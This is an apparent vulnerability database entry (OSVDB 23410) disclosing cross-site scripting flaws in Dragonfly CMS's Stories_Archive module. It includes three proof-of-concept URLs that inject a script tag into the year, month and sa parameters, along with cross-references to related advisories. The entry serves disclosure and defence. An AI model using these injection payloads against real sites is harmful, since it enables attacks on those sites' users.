CPG Dragonfly CMS Stories_Archive Module Multiple Variable XSS

2006-02-22T07:17:34
ID OSVDB:23410
Type osvdb
Reporter OSVDB
Modified 2006-02-22T07:17:34

Description

Manual Testing Notes

http://[target]/index.php?name=Stories_Archive&sa=show_month&year=2005&month=11"><script>alert()</script> http://[target]/index.php?name=Stories_Archive&sa=show_month&year=2005"><script>alert()</script>>&month=11 http://[target]/index.php?name=Stories_Archive&sa=show_all"><script>alert()</script>

References:

Vendor URL: http://dragonflycms.org/ Security Tracker: 1015661 Secunia Advisory ID:18940 Related OSVDB ID: 23408 Related OSVDB ID: 23409 Related OSVDB ID: 23411 Related OSVDB ID: 23412 Related OSVDB ID: 23413 Related OSVDB ID: 23414 Related OSVDB ID: 23415 Other Advisory URL: http://lostmon.blogspot.com/2006/02/multiple-cross-site-scripting-in.html FrSIRT Advisory: ADV-2006-0688 CVE-2006-1033 Bugtraq ID: 16784